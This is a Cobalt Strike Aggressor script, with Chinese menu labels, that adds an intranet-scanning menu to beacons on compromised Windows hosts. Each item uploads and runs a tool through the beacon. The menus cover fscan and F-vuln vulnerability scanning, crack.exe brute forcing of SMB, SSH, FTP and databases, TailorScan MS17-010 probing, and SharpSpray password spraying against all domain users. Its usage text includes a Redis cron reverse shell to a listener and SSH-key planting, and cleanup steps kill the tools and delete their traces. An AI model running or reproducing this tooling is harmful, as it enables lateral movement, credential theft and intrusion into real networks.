#Intranet scan

menu "☠ 内网扫描" {

  menu "❀ F-vuln (作者编写),因编码原因，暂建议使用命令行下运行该程序" {
    item "上传 F-vuln" {
      blog($1, "\c9=========== 上传 F-vuln ==========");
      $bid = $1;
      $dialog = dialog("上传fscan", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &Fvuln);
      dialog_description($dialog, "一款自动化工具，主要适用于日常安全服务、渗透测试人员和RedTeam红队人员，它集合的功能包括：存活IP探测、开放端口探测、web服务探测、web漏洞扫描、smb爆破、ssh爆破、ftp爆破、mssql爆破等其他数据库爆破工作以及大量web漏洞检测模块。它可以根据目标开放的服务进行特定操作，不做无用功。项目地址：https://github.com/d3ckx1/Fvuln");
      drow_text($dialog, "UploadPath",  "上传路径: ");
      dbutton_action($dialog, "上传");
      dialog_show($dialog);
    }
    sub Fvuln {
      bcd($bid, $3['UploadPath']);
      if (-is64 $bid['id']) {
        bupload($bid, script_resource("/scripts/Intranet_scan/Fvuln.exe"));
      }else{
        bupload($bid, script_resource("/scripts/Intranet_scan/Fvuln.exe"));
      }      
    }
    item "运行 F-vuln"{
      blog($1, "\c9=========== 运行 F-vuln ==========");
      $bid = $1['@'];
      btask($bid, "-----------------------------------F-vuln 使用方法---------------------------------------", "");
      btask($bid, "Fvuln.exe", "");      
      btask($bid, "Fvuln.exe -t 192.168.1.1/24                      (默认使用全部模块)", "");
      btask($bid, "Fvuln.exe -u http;//www.baidu.com                (单URL扫描)", "");
      btask($bid, "Fvuln.exe -f ip.txt                              (对文档内的IP进行扫描工作)", "");
  
      $dialog = dialog("运行fscan",%(exec => "Fvuln.exe -t 192.168.1.1/24", bid => $bid),&Fvuln_run);
      dialog_description($dialog, "请在下方输入运行指令：");
      drow_text($dialog, "exec", "Exec: ");
      dbutton_action($dialog, "运行");
      dialog_show($dialog);
    }
    sub Fvuln_run{
      $exec = $3['exec'];
      brun($bid, "$exec");
    }
    item "删除 F-vuln"{
      blog($1, "\c9=========== 删除 F-vuln ==========");
      $bid = $1['@'];
      bshell($bid, "taskkill -f /im Fvuln.exe & del /f /s /q Fvuln.exe & del /f /s /q Fvuln_report.txt");
    }
  }


  menu "❀ Fscan" {
    item "上传 Fscan" {
    	blog($1, "\c9=========== 上传 Fscan ==========");
      $bid = $1;
      $dialog = dialog("上传fscan", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &fscan);
      dialog_description($dialog, "支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写私钥、计划任务反弹shell、读取win网卡信息等。项目地址：https://github.com/shadow1ng/fscan");
      drow_text($dialog, "UploadPath",  "上传路径: ");
      dbutton_action($dialog, "上传");
      dialog_show($dialog);
    }
    sub fscan {
      bcd($bid, $3['UploadPath']);
      if (-is64 $bid['id']) {
        bupload($bid, script_resource("/scripts/Intranet_scan/fscan/x64/fscan.exe"));
      }else{
        bupload($bid, script_resource("/scripts/Intranet_scan/fscan/x86/fscan.exe"));
      }      
    }
    item "运行 Fscan"{
    	blog($1, "\c9=========== 运行 Fscan ==========");
      $bid = $1['@'];
      btask($bid, "----------------------Fscan 使用方法-------------------------", "");
      btask($bid, "fscan.exe", "");      
      btask($bid, "fscan.exe -h 192.168.1.1/24                      (默认使用全部模块)", "");
      btask($bid, "fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub       (redis 写私钥)", "");
      btask($bid, "fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)", "");
      btask($bid, "fscan.exe -h 192.168.1.1/24 -c whoami            (ssh 爆破成功后，命令执行)", "");
      btask($bid, "fscan.exe -h 192.168.1.1/24 -m ssh -p 2222       (指定模块ssh和端口)", "");
      btask($bid, "fscan.exe -h 192.168.1.1/24 -m ms17010           (指定模块)", "");
      btask($bid, " ", "");
      btask($bid, "-h 192.168.1.1/24 (C段)", "");
      btask($bid, "-h 192.168.1.1/16 (B段)", "");
      btask($bid, "-h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息)", "");
      btask($bid, "-hf ip.txt        (以文件导入)", "");
      btask($bid, " ", "");
      btask($bid, "fscan.exe -h      (查看完整使用方法)", "");
      btask($bid, " ", "");      
      $dialog = dialog("运行fscan",%(exec => "fscan.exe -h 192.168.1.1/24 -o out.txt", bid => $bid),&fscan_run);
      dialog_description($dialog, "请在下方输入运行指令：");
      drow_text($dialog, "exec", "Exec: ");
      dbutton_action($dialog, "运行");
      dialog_show($dialog);
    }
    sub fscan_run{
      $exec = $3['exec'];
      brun($bid, "$exec");
    }
    item "删除 Fscan"{
    	blog($1, "\c9=========== 删除 Fscan ==========");
      $bid = $1['@'];
      bshell($bid, "taskkill -f /im fscan.exe & del /f /s /q fscan.exe & del /f /s /q out.txt");
    }
  }

  menu "❀ Crack (内网爆破软件)" {
    item "上传 Crack" {
    	blog($1, "\c9=========== 上传 Crack ==========");
        $bid = $1;
        $dialog = dialog("上传crack", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &crack);
        dialog_description($Dialog, "支持爆破ftp，ssh，smb，mssql，mysql, postgresql,爆破完毕会在当前目录生成result.txt。fork地址：https://github.com/oksbsb/crack");
        drow_text($dialog, "UploadPath",  "上传路径: ");
        dbutton_action($dialog, "上传");
        dialog_show($dialog);
    }
      sub crack {
        bcd($bid, $3['UploadPath']);
        bupload($bid, script_resource("/scripts/Intranet_scan/crack.exe"));
      }
    item "运行 Crack"{
    	blog($1, "\c9=========== 运行 Crack ==========");
        $bid = $1['@'];
        btask($bid, "------------------------------Crack 使用方法----------------------------------", "");
        btask($bid, "crack.exe", "");
        btask($bid, "-i string", "");
        btask($bid, "   ip addr 192.168.1.1/24，192.168.1-255，192.168.1.1", "");
        btask($bid, "-p string", "");
        btask($bid, "   port 21,22，445，3306，1433", "");
        btask($bid, "-U string", "");
        btask($bid, "   filename list or username", "");
        btask($bid, "-P string", "");
        btask($bid, "   filename list or username", "");
        btask($bid, "-s string", "");
        btask($bid, "   service ftp  ssh，smb，mssql，mysql, postgresql   default  only scan tcp port (default \"scan\")", "");
        btask($bid, "-t int", "");
        btask($bid, "   thread (default 100)", "");
        btask($bid, " ", "");        
        $Dialog = dialog("运行crack",%(ip => "192.168.1.1/24", port => "445", username => "filename list or username", password => "filename list or password", type => "smb", thread => "100",bid => $bid),&crack_run);
        dialog_description($Dialog, "支持爆破ftp，ssh，smb，mssql，mysql, postgresql,爆破完毕会在当前目录生成result.txt。");
        drow_text($Dialog, "ip", "ip: ");
        drow_text($Dialog, "port", "port: ");
        drow_text($Dialog, "username", "username: ");
        drow_text($Dialog, "password", "password: ");
        drow_text($Dialog, "type", "type: ");
        drow_text($Dialog, "thread", "thread: ");
        dbutton_action($Dialog, "运行");
        dialog_show($Dialog);
    }
    sub crack_run{
        local('$Name $port $username $password $type $thread');
        $Name = $3['ip'];
        $port = replace($3['port'], "\"", "");
        $username = $3['username'];
        $password = $3['password'];
        $type = $3['type'];
        $thread = $3['thread'];
        bshell($bid, "crack.exe -i  $+ $Name -p  $+ $port -U  $+ $username -P  $+ $password -s  $+ $type -t  $+ $thread");
    }
    item "删除 Crack"{
    	blog($1, "\c9=========== 删除 Crack ==========");
        local('$bid');
        foreach $bid ($1){
          bshell($1, "taskkill -f /im crack.exe & del /f /s /q crack.exe");
        }
    }
  }

  item "❀ SharpWebScan (探测web服务)" {
  	blog($1, "\c9=========== 运行 SharpWebScan ==========");
    $bid = $1['@'];
    $dialog = dialog("SharpWebScan", %(iptype => "-IP",ip => beacon_info($bid,"internal"),port => "80,443,7001,8000,8001,8080,8888",bid => $bid), &SharpWebScan);
    dialog_description($dialog, "扫描IP或C段的Web服务，获取Title，可自定义多端口扫描，返回web地址和title。项目地址：https://github.com/RcoIl/CSharp-Tools/tree/master/SharpWebScan");
    drow_text($dialog, "ip", "ip:  ");
    drow_text($dialog, "port", "ports:  ");
    drow_combobox($dialog, "iptype", "-ip/-cip", @("-IP", "-CIP"));
    dbutton_action($dialog, "运行");
    dialog_show($dialog);
  }
  sub SharpWebScan {
    $arg = join(' ', @($3['iptype'],$3['ip'],$3['port']));
    bexecute_assembly($bid, script_resource("/scripts/Intranet_scan/SharpWebScan.exe"), $arg);
  }

  menu "❀ TailorScan (内网扫描器)" {
    item "上传TailorScan" {
    	blog($1, "\c9=========== 上传 TailorScan ==========");
      $bid = $1;
      $dialog = dialog("上传TailorScan", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &TailorScan);
      dialog_description($dialog, "支持端口扫描，识别服务，获取title，扫描多网卡，ms17010扫描，icmp存活探测。项目地址：https://github.com/uknowsec/TailorScan");
      drow_text($dialog, "UploadPath",  "上传路径: ");
      dbutton_action($dialog, "上传");
      dialog_show($dialog);
    }
    sub TailorScan {
      bcd($bid, $3['UploadPath']);
      if (-is64 $bid['id']) {
        bupload($bid, script_resource("/scripts/Intranet_scan/TailorScan/x64/TailorScan.exe"));
      }else{
        bupload($bid, script_resource("/scripts/Intranet_scan/TailorScan/x86/TailorScan.exe"));
      }      
    }
    item "运行TailorScan"{
    	blog($1, "\c9=========== 运行 TailorScan ==========");
			$bid = $1['@'];
      btask($bid, " ", "");
      btask($bid, "------------------------------TailorScan 使用方法--------------------------------", "");
      btask($bid, "TailorScan.exe", "");
      btask($bid, " ", "");
      btask($bid, "扫描IP格式支持：", "");
      btask($bid, "   192.168.1.1", "");
      btask($bid, "   192.168.1.1-10", "");
      btask($bid, "   192.168.1.*", "");
      btask($bid, "   192.168.1.0/24", "");
      btask($bid, " ", "");
      btask($bid, "端口支持自定义列表，用','分隔，如：", "");
      btask($bid, "   21,22,80-99,8000-8080", "");
      btask($bid, " ", "");
      btask($bid, "端口扫描，支持tcp、icmp:", "");
      btask($bid, "   TailorScan.exe portscan 192.168.0.1/24 80,8080 tcp", "");
      btask($bid, "   TailorScan.exe portscan 192.168.0.1/24 tcp", "");
      btask($bid, " ", "");
      btask($bid, "永恒之蓝探测：", "");
      btask($bid, "   TailorScan.exe ms17010 -i 192.168.0.1", "");
      btask($bid, "   TailorScan.exe ms17010 -n 192.168.0.1/24", "");
      btask($bid, " ", "");
      btask($bid, "OXID Find：", "");
      btask($bid, "   TailorScan.exe oxidfind -i 192.168.0.1", "");
      btask($bid, "   TailorScan.exe oxidfind -n 192.168.0.1/24", "");
      btask($bid, " ", "");
      btask($bid, "ICMP check：", "");
      btask($bid, "   TailorScan.exe icmpcheck 192.168.0.1/24", "");
      btask($bid, " ", "");
			$dialog = dialog("运行TailorScan",%(exec => "TailorScan.exe ms17010 -n 192.168.0.1/24", bid => $bid),&TailorScan_run);
			dialog_description($dialog, "注意控制台输出的使用说明，直接在下方输入执行指令：");
      drow_text($dialog, "exec", "Exec: ");
			dbutton_action($dialog, "运行");
			dialog_show($dialog);
		}
		sub TailorScan_run{
      $exec = $3['exec'];
			brun($bid, "$exec");
		}
    item "删除TailorScan"{
    		blog($1, "\c9=========== 删除 TailorScan ==========");
			$bid = $1['@'];
      bshell($bid, "taskkill -f /im TailorScan.exe & del /f /s /q TailorScan.exe");
    }
  }

  item "❀ SharpSpray (域内密码爆破)" {
  	blog($1, "\c9=========== 运行 SharpSpray ==========");
    $bid = $1['@'];
    $dialog = dialog("SharpSpray", %(passwd => "123,888",Delay => "1000",Sleep => "1",bid => $bid), &SharpSpray);
    dialog_description($dialog, "使用LDAP对域的所有用户执行密码喷雾攻击。seeds：指定几个密码生成字典，逗号分隔。passwords：指定密码爆破，可多个密码，逗号分隔。delay：密码喷雾的延迟，毫秒为单位。sleep：密码猜测之间sleep周期分钟数。项目地址：https://github.com/jnqpblc/SharpSpray");
    drow_combobox($dialog, "type", "type:", @("--Seeds","--Passwords"));
    drow_text($dialog, "passwd", "passwd:  ");
    drow_text($dialog, "Delay", "Delay:  ");
    drow_text($dialog, "Sleep", "Sleep:  ");
    dbutton_action($dialog, "运行");
    dialog_show($dialog);
  }
  sub SharpSpray {
    $arg = join(' ',  @($3['type'],$3['passwd'],"--Sleep",$3['Sleep'],"--Delay",$3['Delay']));
    bexecute_assembly($bid, script_resource("/scripts/Intranet_scan/SharpSpray.exe"), $arg);
  }

}
